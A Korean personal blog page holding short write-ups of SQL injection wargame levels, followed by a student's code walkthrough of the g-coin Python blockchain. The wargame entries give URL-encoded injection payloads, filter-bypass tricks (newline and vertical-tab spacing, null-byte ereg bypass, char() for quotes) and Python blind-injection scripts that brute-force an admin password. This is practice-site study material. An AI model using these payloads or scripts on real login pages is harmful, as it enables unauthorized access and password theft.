Hubeen's Home

call printf 106건이 검색되었습니다.


이 문제는 우리는 pw를 입력하지만 앞에서 주석처리가 되어있었다;;

뭐 줄넘김 같은게 되지 않을까해서 \n을 넣어보고 했는데 

%0a가 있음을 깨달았다.


?pw=qwer%27%20%0a%20and%20pw=%27%27%20or%20id=%27admin

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] dragon  (0) 2018.09.22
[LOB1] xavis  (0) 2018.09.22
[LOB1] nightmare  (0) 2018.09.22
[LOB1] succubus  (0) 2018.09.22
[LOB1] zombie_assassin  (0) 2018.09.22
[LOB1] assessin  (0) 2018.09.22

댓글 0


이 문제는 정말 좋은 경험을 했다고 생각한다.



40글자라고 해서 좀 놀랐다.
허나 ascii(substr(pw,1,1)) 로 돌려보자 모든 값들이 0으로 나오는 것을 보고 유니코드임을 파악할 수 있었다.
유니코드는 4바이트로서 40/4를 하여 총 10글자임을 알 수 있었다.

유니코드는 ord 함수를 이용하여 뽑아내었따


import requests


url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php"

headers = {'User-Agent': 'Mozilla/5.0'}

cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}



'''

?pw=1234%27%20or%20id=%27admin%27%20%20and%20right(left(pw,1),1)=%27a%27%23

?pw=1234%27%20or%20id=%27admin%27%20and%20ascii(substr(pw,%201,%201))%20=%2010%20%23

'''


for x in range(10):

    for c in range(33, 255):

        rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20ord(substr(pw,%20" + str(x) + ",%201))%20=%20" + str(c) + "%20%23", headers=headers, cookies=cookies)

        text = rs.text


        if("<h2>Hello admin</h2>" in text):

            print(str(x+1) +  " ascii = " + str(c) + " find it")




'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] dragon  (0) 2018.09.22
[LOB1] xavis  (0) 2018.09.22
[LOB1] nightmare  (0) 2018.09.22
[LOB1] succubus  (0) 2018.09.22
[LOB1] zombie_assassin  (0) 2018.09.22
[LOB1] assessin  (0) 2018.09.22

댓글 0


이 문제는 mysql 에서 문자열은 0이 된다.


?pw=%27)=0;%00


0=0은 true이기에 조건이 맞아서 출력이 댄다.

SELECT 'a' = 0 — TRUE

SELECT 'abc' = 0 — TRUE


SELECT '1' = 0 — FALSE

SELECT '123' = 0 — FALSE



SELECT 'x1' = 0 — TRUE


SELECT '1x' = 0 — FALSE 

SELECT '1x' = 1 — TRUE


SELECT '12x1' = 0 — FALSE

SELECT '12x1' = 121 — FALSE

SELECT '12x1' = 12 — TRUE 



'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] dragon  (0) 2018.09.22
[LOB1] xavis  (0) 2018.09.22
[LOB1] nightmare  (0) 2018.09.22
[LOB1] succubus  (0) 2018.09.22
[LOB1] zombie_assassin  (0) 2018.09.22
[LOB1] assessin  (0) 2018.09.22

댓글 0


이 문제는 싱글쿼터를 못 넣는다...

허나 생각해보니 저 쿼터를 문자열로 인식하게 되면 대는거시다.


그리고 무조건 True로 만들어서 아무 아이디나 뜨게 하면 되는거시다.


?id=\&pw=%20||%201=1%20%23

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] xavis  (0) 2018.09.22
[LOB1] nightmare  (0) 2018.09.22
[LOB1] succubus  (0) 2018.09.22
[LOB1] zombie_assassin  (0) 2018.09.22
[LOB1] assessin  (0) 2018.09.22
[LOB1] giant  (0) 2018.09.22

댓글 0


이 문제는 싱글 쿼터를 사용못하게 막아두었다.

하지만 ereg에 널값을 주게 되면 싱글쿼터를 사용할 수 있다.


?id=%00%27%20%7C%7Cid="admin"%20%20%23

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] nightmare  (0) 2018.09.22
[LOB1] succubus  (0) 2018.09.22
[LOB1] zombie_assassin  (0) 2018.09.22
[LOB1] assessin  (0) 2018.09.22
[LOB1] giant  (0) 2018.09.22
[LOB1] bugbear  (0) 2018.09.22

댓글 0


like에는 % 정규식 비슷한게 있다.


https://www.w3schools.com/sql/sql_like.asp


이 문제는 조금 당황스러운 문제였다.

아무리해도 어드민이 뜨지 않는 것이다.


그래서 혹시 어드민과 게스트의 비밀번호가 비슷한게 아닐까 라는 생각을 하게 되었다.


import requests

headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

strs = "8_"

for i in range(8):
    for c in range(48,125):
        rs = requests.get(url + "?pw=" + strs + chr(c) + "%" ,headers=headers, cookies=cookies)

        text = rs.text

        if("<br><h2>Hello admin</h2>" in text):
            strs += chr(c)

            print(str(i+1) + " " +chr(c) + " find it”)

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] succubus  (0) 2018.09.22
[LOB1] zombie_assassin  (0) 2018.09.22
[LOB1] assessin  (0) 2018.09.22
[LOB1] giant  (0) 2018.09.22
[LOB1] bugbear  (0) 2018.09.22
[LOB1] darkknight  (0) 2018.09.22

댓글 0


이 문제는 좀 신기했다.

실제에서도 이런 일이 생기는걸까?

무슨 의도가 있는지 나는 잘 모르겠다.


그냥 사이에 공백을 만들어줘서 풀었다.


?shit=%0b

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] zombie_assassin  (0) 2018.09.22
[LOB1] assessin  (0) 2018.09.22
[LOB1] giant  (0) 2018.09.22
[LOB1] bugbear  (0) 2018.09.22
[LOB1] darkknight  (0) 2018.09.22
[LOB1] golem  (0) 2018.09.22

댓글 0


이 문제는 like가 막혀있으므로 in을 이용하여 풀면 된다.


?pw=1&no=-1%0d%7C%7Cid%0din%0d(%22admin%22)%0d%26%26%0dlength(pw)%0din%0d(8)


?pw=1&no=-1%0d%7C%7Cid%0din%0d(%22admin%22)%0d%26%26%0dright(left(pw,1),1))%0din%0d(%22a%22)


import requests


headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

'''
?pw=1&no=-1%0d%7C%7Cid%0din%0d(%22admin%22)%0d%26%26%0dright(left(pw,1),1))%0din%0d(%22a%22)
'''
for i in range(8):
    for c in range(33, 125):
        rs = requests.get(url + "?pw=1&no=-1%0d%7C%7Cid%0din%0d(%22admin%22)%0d%26%26%0dright(left(pw," + str(i+1) + "),1)%0din%0d(%22" + chr(c) + "%22)", headers=headers, cookies=cookies)
        text = rs.text

        if("<h2>Hello admin</h2>" in text):
            print(str(i+1) + " " +chr(c) + " find it”) 


'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] assessin  (0) 2018.09.22
[LOB1] giant  (0) 2018.09.22
[LOB1] bugbear  (0) 2018.09.22
[LOB1] darkknight  (0) 2018.09.22
[LOB1] golem  (0) 2018.09.22
[LOB1] skelleton  (0) 2018.09.22

댓글 0


?pw=1&no=1%20%7C%7C%20id%20like%20%22admin%22%20%26%26length(pw)%20like%208


?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,1),1)%20like%20”a”


import requests


headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

'''
?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,1),1)%20like%20a
'''

for x in range(8):
    for c in range(33, 125):
        rs = requests.get(url + '?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,' + str(x+1) + '),1)%20like%20"' + chr(c) +'"' , headers=headers, cookies=cookies)
        text = rs.text

        if("<h2>Hello admin</h2>" in text):

            print(str(x+1) + " " + chr(c) + " find it") 


'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] giant  (0) 2018.09.22
[LOB1] bugbear  (0) 2018.09.22
[LOB1] darkknight  (0) 2018.09.22
[LOB1] golem  (0) 2018.09.22
[LOB1] skelleton  (0) 2018.09.22
[LOB1] vampire  (0) 2018.09.22

댓글 0


이 문제는 pw 가 실제 pw와 같아야한다.

이 역시 블라인드 인젝션으로 풀었다.


?pw=1234%27%7C%7Cid%20like%20%27admin%27%20%26%26%20length(pw)%20like%208%23


아마 이 문제 자바 수업때 안듣고 풀었던것 같은데 언제 풀었는지 기억이 안난다.

스크립트가 에버노트에 있는거보면 수업시간때 푼것 같다.


import requests

headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

'''
?pw=1234%27||id%20like%20%27admin%27%20%26%26%20right(left(pw,1),1)%20like%2013%23
'''
for x in range(8):
    for i in range(33, 125):
        rs = requests.get(url + "?pw=1234%27||id%20like%20%27admin%27%20%26%26%20right(left(pw," + str(x+1) + "),1)%20like%20'" + chr(i) + "' %23", headers=headers, cookies=cookies)
        text = rs.text

        if(“<br><h2>Hello admin</h2>" in text):

            print(str(x+1) + " " + chr(i) + " find it")

이 문제는 = 이 막혀있다.
in 이나 like로 이용하여 우회하면 된다. 


'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] bugbear  (0) 2018.09.22
[LOB1] darkknight  (0) 2018.09.22
[LOB1] golem  (0) 2018.09.22
[LOB1] skelleton  (0) 2018.09.22
[LOB1] vampire  (0) 2018.09.22
[LOB1] troll  (0) 2018.09.22

댓글 0


아이디만 바꾸면 대는 문제였다.


?pw=1234%27%20or%20id=%27admin%27%20%23%20

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] darkknight  (0) 2018.09.22
[LOB1] golem  (0) 2018.09.22
[LOB1] skelleton  (0) 2018.09.22
[LOB1] vampire  (0) 2018.09.22
[LOB1] troll  (0) 2018.09.22
[LOB1] orge  (0) 2018.09.22

댓글 0


사실 이 문제는 아마도 aadmindmin 을 의도한 것 같지만 나는 그냥 대문자로 풀었다.

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] golem  (0) 2018.09.22
[LOB1] skelleton  (0) 2018.09.22
[LOB1] vampire  (0) 2018.09.22
[LOB1] troll  (0) 2018.09.22
[LOB1] orge  (0) 2018.09.22
[LOB1] darkelf  (0) 2018.09.22

댓글 0


입력한 값이 admin일 경우 hehe를 띄운다


대문자를 이용하여 풀면 댄다.

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] skelleton  (0) 2018.09.22
[LOB1] vampire  (0) 2018.09.22
[LOB1] troll  (0) 2018.09.22
[LOB1] orge  (0) 2018.09.22
[LOB1] darkelf  (0) 2018.09.22
[LOB1] wolfman  (0) 2018.09.22

댓글 0


이것도 실제 pw 와 입력한 pw가 맞아야 풀리는 문제이기에 블라인드 인젝션을 이용하였다.


먼저 길이부터 파악했다.


?pw=1234%27%0d||id=%27admin%27%20%26%26%20length(pw)=8%0d--%20-


스크립트를 랩실에 있고 현재는 집에 있어서 걍 저걸로 올림 ㅎㅎ;


?pw=1234%27%0d||%0did=%27admin%27%0d%26%26%0dascii(substr(pw,1,1))%3E0%0d--%20-


이 또한 스크립트가 랩실에 있다 ㅎ


아무튼 하나하나 뽑아서 풀었다.

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] vampire  (0) 2018.09.22
[LOB1] troll  (0) 2018.09.22
[LOB1] orge  (0) 2018.09.22
[LOB1] darkelf  (0) 2018.09.22
[LOB1] wolfman  (0) 2018.09.22
[LOB1] orc  (0) 2018.09.22

댓글 0


이 문제는 전의 문제와 비슷한 방법으로 풀지만 or과 and가 막혀따


하지만 || 으로 대신하여 우회가 가능하다.


?pw=1234%27%20||%20id=%27admin%27%20%20%23

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] troll  (0) 2018.09.22
[LOB1] orge  (0) 2018.09.22
[LOB1] darkelf  (0) 2018.09.22
[LOB1] wolfman  (0) 2018.09.22
[LOB1] orc  (0) 2018.09.22
[LOS1] goblin  (0) 2018.09.18

댓글 0


이 문제는 아이디를 admin으로 바꾸면 된다.


pw를 아무거나 입력하고 뒤에 id=admin 이 실행되게 하면 되겠다.


?pw=123412312312%27%0dor%0did=%27admin%27%0d%23

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] orge  (0) 2018.09.22
[LOB1] darkelf  (0) 2018.09.22
[LOB1] wolfman  (0) 2018.09.22
[LOB1] orc  (0) 2018.09.22
[LOS1] goblin  (0) 2018.09.18
[LOS1] cobolt  (0) 2018.09.18

댓글 0


pw가 실제 pw가 맞는지 체크한다.

블라인드 인젝션 문제였다.


먼저 길이를 파악하기 위해 아래의 코드를 ㅇㅣ용햇다


import requests

url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'qfr7dlp9t9g1nat81riiigb065'}


for i in range(20):
rs = requests.get(url + "?pw=1234' || id='admin' and length(pw)="+str(i) + " -- -", headers=headers, cookies=cookies)

text = rs.text
if("<br><h2>Hello admin</h2>" in text):

print(str(i) + " find it") 

길이를 확인한 후 씬나게 때려맞췄다.

import requests

url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'qfr7dlp9t9g1nat81riiigb065'}


for j in range(8):
for i in range(33, 125):
rs = requests.get(url + "?pw=1234' || id='admin' and ascii(substr(pw," + str(j+1) + ", 1))=" + str(i) + "-- -", headers=headers, cookies=cookies)

text = rs.text
if("<br><h2>Hello admin</h2>" in text):
print(str(j) + " " + chr(i) + " find it")
break 


'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] darkelf  (0) 2018.09.22
[LOB1] wolfman  (0) 2018.09.22
[LOB1] orc  (0) 2018.09.22
[LOS1] goblin  (0) 2018.09.18
[LOS1] cobolt  (0) 2018.09.18
[LOS1] gremlin  (0) 2018.09.18

댓글 0


id를 어드민으로 만들면 댄다.


and 연산이 먼저니까,,,0 으로 만들고 or로 뒤에 코드를 실행시키면 되시겟다!


?no=1 로 주면 게스트라고 뿌려준다.


없을 것 같은 값을 넣어서 아무 값도 안뿌려주면 없다는거시겠지,,,!


싱글쿼터랑 더블쿼터는 막혀있어서 char로 우회해줬다.


?no=112302130131290123||id=char(97,100,109,105,110)

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] wolfman  (0) 2018.09.22
[LOB1] orc  (0) 2018.09.22
[LOS1] goblin  (0) 2018.09.18
[LOS1] cobolt  (0) 2018.09.18
[LOS1] gremlin  (0) 2018.09.18
Mr.Robot Season2 Easter Egg  (0) 2016.07.21

댓글 0


이번 문제는 id가 admin이여야 풀림


개 멍청하게 연산자 우선 순위 생각 안해서 삽질을 했다.


?id=admin%27%20and%20pw=%271234551231%27%20or%20%271%27=%271%27%20--%20-


연산자 우선 순위 생각을 못하고 저렇게 작성했다...ㅠㅠㅠ

and 먼저 연산되고 그 뒤에 or 이 되는데 ㅠㅠㅠㅠㅠ

왜 or 먼저 된다고 생각했는지 원...


?id=admin%27%20and%20(pw=%271234551231%27%20or%20%271%27=%271%27)%20--%20-





'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOB1] orc  (0) 2018.09.22
[LOS1] goblin  (0) 2018.09.18
[LOS1] cobolt  (0) 2018.09.18
[LOS1] gremlin  (0) 2018.09.18
Mr.Robot Season2 Easter Egg  (0) 2016.07.21
[ReverseLab 스터디] [Abex's CM] Abex 1~5  (0) 2016.07.11

댓글 0




이 문제는 아이디가 걍 로그인만 되면 풀림


?id=hubeen&pw=1234%27%20or%201=1--%20-



' 로 싱글 쿼터 닫아주고 or 로 1=1 -- - 로 주석처리해서 풀음~

'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOS1] goblin  (0) 2018.09.18
[LOS1] cobolt  (0) 2018.09.18
[LOS1] gremlin  (0) 2018.09.18
Mr.Robot Season2 Easter Egg  (0) 2016.07.21
[ReverseLab 스터디] [Abex's CM] Abex 1~5  (0) 2016.07.11
[Codegate2016] Write ups  (0) 2016.03.18

댓글 0



안녕하세요. 


저는 공주대학교 컴퓨터공학부 컴퓨터소프트웨어전공 17학번 문승현입니다. 


현재 블록체인 기술에 대해 공부를 하여 공부한 내용을 정리하고자 게시글을 작성하였습니다. 


미리 읽어주시는 분들께 감사하며 잘못된 지식이 있을 경우 마음 편하게 피드백주시면 감사하겠습니다.


g-coin 분석(0) : http://blog.hubeen.kr/337

g-coin 분석(1) : http://blog.hubeen.kr/339


벌써 분석(2)라니 뿌듯함을 감출 수 없습니다!!!


오늘 게시글에서는 실제로 서버에서 소스코드를 작동을 시켜 사용을 해볼 예정입니다.


저는 골빈님께서 올려주신 Insomnia라는 툴을 사용하지 않고 포스트맨이라는 툴을 사용하였습니다.


서버 구동


python3 app.py --port 5000


위와 같이 실행을 하게 되면 아래와 같이 메세지가 띄어졌다면 서버가 실행된것입니다!



 * Running on http://0.0.0.0:5000/ (Press CTRL+C to quit)



아, 저는 app.py의 코드를 외부 접속도 허용하게 실행하여 0.0.0.0 으로 메세지가 떴지만 다른 분들은 127.0.0.1로 뜨실 겁니다 !


서버를 실행을 성공적으로 하셨다면 이제 이것저것 쇼핑하듯이 구경해볼까요?!


채굴(mine)

채굴에 대한 링크는 서버 주소:5000/mine [post] 를 하면 된다고 깃허브에 나와있습니다!

한번 포스트맨을 이용하여 채굴을 해볼까요?


http://서버주소:5000/mine 으로 post를 쏴보니 채굴이 되었음을 볼 수 있습니다.



{

    "block": {

        "header": {

            "difficulty": 1,

            "previous_hash": "64fb44605fe924d910fc285a72f2b8d9220fd4cff755510b6e0e6c476f4cae4e",

            "proof": 11,

            "timestamp": 1520200361.470756

        },

        "transactions": [

            {

                "amount": 1,

                "recipient": "0e5d1ef7e4a944b2be47c1913dea0c8f",

                "sender": "0"

            }

        ]

    },

    "message": "New block is mined!"

}



보낸이는 "0"으로 신 혹은 관리자가 0e5d1ef7e4a944b2be47c1913dea0c8f 주소로 1을 보내준 것을 볼 수 잇네요!

그리고 메세지에 새로운 블럭이 채굴되었다라는 것도 보이네요!

블럭에 대한 헤더는 어려움을 1, 그리고 채굴 전의 초기 블럭 생성이 되었으니 그 초기 블럭의 해쉬를 이전 해쉬 값에 들어간것도 보이네요!


자 그러면 채굴이 되었다면 현재 블록체인이 어떻게 되어있는지 구경하러가볼까요?


블록체인 (chain)

현재 모든 체인이 어떻게 이어져있는지 보도록 하겠습니다.

GET 파라메터로 http://서버주소:5000/chain 을 하시면 됩니다.


초기 블럭과 현재 아까 채굴한 블럭이 이어져있는 것을 볼 수 있으며 전체 갯수는 2개라는 것을 볼 수 있습니다.


거래 (transaction)

이제 거래를 해보도록 해볼까요?!
먼저 신이 hubeen 주소로 1024개를 보내는 것을 해보도록 하겠습니다

보내는데에는 post 형식으로 http://서버주소:5000/transaction 을 하시면 됩니다.

신 혹은 관리자가 거래 전송


네, 이제 보내졌는지 거래 기록에 제대로 기록이 되었는지 확인해보죠!


거래 확인

거래 확인은 GET 파라메터로 http://서버주소:5000/transaction 을 하시면 됩니다.



[

    {

        "amount": 1024,

        "recipient": "hubeen",

        "sender": "0"

    }

]



현재 거래 기록에 보낸이는 "0"으로 신 혹은 관리자가 받는이 hubeen에게 1024개를 보낸 것이 거래 기록에 잘 저장되있음을 볼 수 있습니다.


이제 hubeen이 postman에게 500개를 전송하는 것을 다시 해보도록 하죠!


hubeen->postman 500개 전송


네! 잘 보내진 것을 볼 수 있습니다.

거래 확인



네, 이렇게 코드 리뷰하고 서버에서 실제로 실행하여 확인을 하는 것까지 하였습니다.

이걸로 g-coin은 마무리하며 더 재밌고 괜찮은 코드를 발견하게 되면 그것도 작성하도록 하겠습니다.


읽어주셔서 감사합니다.


'0x30 Study > 0x32 Blockchain' 카테고리의 다른 글

g-coin 분석(2)  (2) 2018.03.05
g-coin 분석(1)  (1) 2018.03.03
g-coin 분석(0)  (0) 2018.03.01
BlockChain을 공부하자! (0)  (0) 2018.02.28

Comment 2

안녕하세요. 

저는 공주대학교 컴퓨터공학부 컴퓨터소프트웨어전공 17학번 문승현입니다. 

현재 블록체인 기술에 대해 공부를 하여 공부한 내용을 정리하고자 게시글을 작성하였습니다. 

미리 읽어주시는 분들께 감사하며 잘못된 지식이 있을 경우 마음 편하게 피드백주시면 감사하겠습니다.


g-coin 분석(0) : g-coin 분석(0)


이전 게시글의 분석글을 위의 링크로 보실 수 있습니다.

이제 이전 분석을 이어가보도록 하겠습니다.


분석


남은 blockchain.py, miner.py, node.py, proof.py 는 현재 게시글에서 정리를 이어가도록 하겠습니다.


proof.py

import hashlib

import gcoin.config as cfg


def valid_proof(block, proof=None):
    """ Validates proof

    last digits of hash(previous_block.header, proof)
        == config.PROOF_DIGITS

    Args:
        block (obj):
        proof (int): proof to validate

    Returns:
        bool:
    """
    proof = proof if proof else block.proof

    proof_seed = '{0}{1}'.format(block.header.hash(),
                                 proof).encode()

    proof_hash = hashlib.sha256(proof_seed).hexdigest()

    return proof_hash[:block.difficulty] == cfg.PROOF_DIGITS * block.difficulty


def find_proof(block):
    """proof of work

    Args:
        block (obj):

    Returns:
        int: proof
    """
    proof = 0

    while valid_proof(block, proof) is False:
        proof += 1

    return proof


proof.py는 config.py 파일을 불러옵니다.

그리고 두개의 함수가 있네요.


def valid_proof(block, proof=None): """ Validates proof last digits of hash(previous_block.header, proof) == config.PROOF_DIGITS Args: block (obj): proof (int): proof to validate Returns: bool: """ proof = proof if proof else block.proof proof_seed = '{0}{1}'.format(block.header.hash(), proof).encode() proof_hash = hashlib.sha256(proof_seed).hexdigest() return proof_hash[:block.difficulty] == cfg.PROOF_DIGITS * block.difficulty

valid_proof 함수는 유효한 증명인지 확인하는 함수인 것 같습니다.
두개의 인자를 받는 것을 볼 수 있습니다.

block : object 타입으로 블록을 넘겨받습니다.
proof : int 타입으로 블록의 유효한 proof인지 확인하는 값 같습니다.

proof에는 블록의 proof를 넘겨받았는지 확인을 하여 대입을 하는 것 같습니다.
proo_seed 에는 블록의 헤더 해쉬+넘겨받은 proof 값
proof_hash 는 sha256암호화로 블록해쉬 + proof의 값을 암호화하여 해쉬화하는 것을 볼 수 있습니다.

그 후 proof_hash 와 임의의 값과 비교를 하는 것을 볼 수 있습니다.

config에서 설정한 어려움 값이 크면 클 수록 유효한지 안한지를 찾기가 어려울 것 같아보이네요 ^^


def find_proof(block):
    """proof of work

    Args:
        block (obj):

    Returns:
        int: proof
    """
    proof = 0

    while valid_proof(block, proof) is False:
        proof += 1

    return proof


인자로 넘겨받는 블록을 유요할때까지 계속 while문으로 돌리는 것을 볼 수 있었습니다.

유효한 해쉬값을 찾을때까지 +=1 을 하여 리턴하네요 !


miner.py

import gcoin.config as cfg
import gcoin.proof as proof
from gcoin.transaction import Transaction


class Miner:
    def __init__(self, account_id):
        self.account_id = account_id

    def __call__(self, blockchain):
        # Adding mining rewards
        transaction = Transaction(cfg.GENESIS_ACCOUNT_ID,
                                  self.account_id, cfg.AMOUNT_OF_REWARD)
        blockchain.add_transaction(transaction)

        # Make new block with transactions and hash of last block
        new_block = blockchain.new_block()

        # Proof of Work
        new_proof = proof.find_proof(new_block)

        new_block.proof = new_proof

        blockchain.add_block(new_block)

        return new_block


채굴하는 코드입니다!!!

채굴!!! 가즈아!!!!!!


먼저 3개의 코드를 불러오는 것을 볼 수 있습니다.


config.py, proof.py, transaction.py


그리고 초기화에서 account_id 를 클래스 자신에게 대입을 하네요.


아마도 이 계정은 채굴자의 계정이 아닐까 싶습니다 :D


그리고 채굴의 기여한 내용을 거래 기록에 남기네요.

그리고 추가를 하구요.

그리고 채굴되었다면 새로운 블럭을 생성하여 채굴이 완료되는 것을 볼 수 있습니다.


그 뒤 새로운 블럭에 유효한 증명을 하여 새로운 블럭에 대입하고 블록체인에 추가를 하고 새로운 블럭을 리턴을 해주는 코드네요.


blockchain.py

import gcoin.proof
import gcoin.config as cfg
from gcoin.book import Book
from gcoin.block import Block


class BlockChain:
    def __init__(self, chain=None):
        """init chain with existing chain
        or make this new blockchain

        Args:
            chain: list of dictionary of Block, see load_chain
        """
        self.chain = []
        self.book = Book()
        self.transactions = []

        if chain:
            self.load_chain(chain)
        else:
            self.init_chain()

    def init_chain(self):
        """Make genesis block"""
        genesis_block = Block([], previous_hash=cfg.GENESIS_HASH)

        genesis_proof = gcoin.proof.find_proof(genesis_block)

        genesis_block.proof = genesis_proof

        self.add_block(genesis_block)

    def add_transaction(self, transaction):
        """Add new transaction
        It will only add amount

        Args:
            transaction (obj): Transaction object

        Returns:
            int: index of next block of chain
                return -1 if it's not correct transaction
        """
        if self.book.check_balance(transaction):
            self.transactions.append(transaction)
            return len(self.chain) + 1  # Add this transaction to next block
        else:
            raise Exception('Transaction is wrong.')

    def new_block(self):
        last_block = self.chain[-1]

        block = Block(self.transactions,
                      previous_hash=last_block.hash())

        self.transactions = []

        return block

    def add_block(self, block):
        self.chain.append(block)
        self.book.apply(block.transactions)

    def valid(self):
        """Valid chain"""
        index = 1

        while index < len(self):
            prev_block = self.chain[index-1]
            curr_block = self.chain[index]

            # Check hash with previous hash
            if curr_block.previous_hash != prev_block.hash():
                return False

            # Check proof of current block
            if not gcoin.proof.valid_proof(curr_block):
                return False

            index += 1

        return True

    def load_chain(self, chain):
        """load chain from list of dictionary
        from existing blockchain

        Args:
            chain (list):
                [{
                    transactions: [{
                        sender: 'dsf9s9f0ad'
                        recipient: 'dfsad90fasf'
                        amount: 12
                    }]
                    proof: 318832940000
                    previous_hash: 'fj9afje9ajf9sef0s0f'
                    timestamp: 1506057125.900785
                }]
        """
        for block in chain:
            block = Block.init_from_json(block)
            self.add_block(block)

    def last_block(self):
        return self.chain[-1]

    def dump(self):
        return [block.dump() for block in self.chain]

    def __len__(self):
        return len(self.chain)


이게 바로 제일 중요한 블록체인에 대한 코드가 아닐까 싶습니다.


찬찬히 코드를 살펴보도록 합시다!!!


def __init__(self, chain=None): """init chain with existing chain or make this new blockchain Args: chain: list of dictionary of Block, see load_chain """ self.chain = [] self.book = Book() self.transactions = [] if chain: self.load_chain(chain) else: self.init_chain()

def init_chain(self): """Make genesis block""" genesis_block = Block([], previous_hash=cfg.GENESIS_HASH) genesis_proof = gcoin.proof.find_proof(genesis_block) genesis_block.proof = genesis_proof self.add_block(genesis_block)


먼저 블록체인을 위해 리스트와 통장(?)과 거래 기록을 초기화하는 것을 볼 수 있습니다.

그 후 체인이 있을 경우 load_chain함수로 생성한 체인에 로드하네요.

아닐 경우엔 init_chain으로 체인을 초기화하는 것을 볼 수 있습니다.


블록체인에 첫 블록을 추가하는 부분이네요 ㅎㅎ


def add_transaction(self, transaction):
        """Add new transaction
        It will only add amount

        Args:
            transaction (obj): Transaction object

        Returns:
            int: index of next block of chain
                return -1 if it's not correct transaction
        """
        if self.book.check_balance(transaction):
            self.transactions.append(transaction)
            return len(self.chain) + 1  # Add this transaction to next block
        else:
            raise Exception('Transaction is wrong.')


거래 기록 object를 받네요!


check_balance로 거래기록을 받은 것을 인자로 넘겨주어 제대로된 거래인지 확인을 합니다.

제대로 된 거래일 경우 거래 기록에 추가하고 체인에 대해 길이 +1을 하네요.


def new_block(self): last_block = self.chain[-1] block = Block(self.transactions, previous_hash=last_block.hash()) self.transactions = [] return block def add_block(self, block): self.chain.append(block) self.book.apply(block.transactions)


마지막 블록이라는 변수에 체인의 마지막 블록을 대입하며 블록을 생성하네요!

생성한 블럭은 반환해주네요!


그리고 말그대로 블럭체인에 블럭을 추가하는 코드입니다.

def load_chain(self, chain): """load chain from list of dictionary from existing blockchain Args: chain (list): [{ transactions: [{ sender: 'dsf9s9f0ad' recipient: 'dfsad90fasf' amount: 12 }] proof: 318832940000 previous_hash: 'fj9afje9ajf9sef0s0f' timestamp: 1506057125.900785 }] """ for block in chain: block = Block.init_from_json(block) self.add_block(block)


네 이건 json 데이터를 받아 block 을 초기화하고 블록체인에 추가하네요.

그 외엔 딱히 중요한 내용은 없는 것 같습니다.


node.py

import requests
from uuid import uuid4

from gcoin.blockchain import BlockChain


class Node:
    def __init__(self, id=None):
        self.id = id if id else self._generate_id()
        self.neighbor = set()

    @staticmethod
    def _generate_id():
        return str(uuid4()).replace('-', '')

    def add(self, address):
        self.neighbor.add(address)

    def __len__(self):
        return len(self.neighbor)

    @staticmethod
    def fetch_neighbor_chain(address):
        res = requests.get('{0}/chain'.format(address))
        return res.json()

    def consensus_with_neighbor(self, blockchain):
        """Consensus conflicts with neighbor

        Args:
            blockchain (obj): BlockChain object of mine for consensus

        Returns:
            obj or None:
                None if my blockchain is King
                new BlockChain object if my blockchain is looser
        """
        new_blockchain = None
        max_length = len(blockchain)

        for node in self.neighbor:
            data = self.fetch_neighbor_chain(node)

            if data['length'] > max_length:
                new_blockchain = BlockChain(chain=data['chain'])

                if not new_blockchain.valid():
                    new_blockchain = None
                else:
                    max_length = len(new_blockchain)

        return new_blockchain


네 드디어 마지막 파일입니다!!!!


def fetch_neighbor_chain(address):
        res = requests.get('{0}/chain'.format(address))
        return res.json()

chain에 get 리퀘스트를 쏴서 현재 블록체인들의 json 파일을 리턴해주네요.


def consensus_with_neighbor(self, blockchain):
        """Consensus conflicts with neighbor

        Args:
            blockchain (obj): BlockChain object of mine for consensus

        Returns:
            obj or None:
                None if my blockchain is King
                new BlockChain object if my blockchain is looser
        """
        new_blockchain = None
        max_length = len(blockchain)

        for node in self.neighbor:
            data = self.fetch_neighbor_chain(node)

            if data['length'] > max_length:
                new_blockchain = BlockChain(chain=data['chain'])

                if not new_blockchain.valid():
                    new_blockchain = None
                else:
                    max_length = len(new_blockchain)

        return new_blockchain

블록체인을 인자로 받아 현재 체인에 대해 추가하는 코드 부분입니다.


이로써 모든 파일에 대한 코드를 분석해보았습니다.


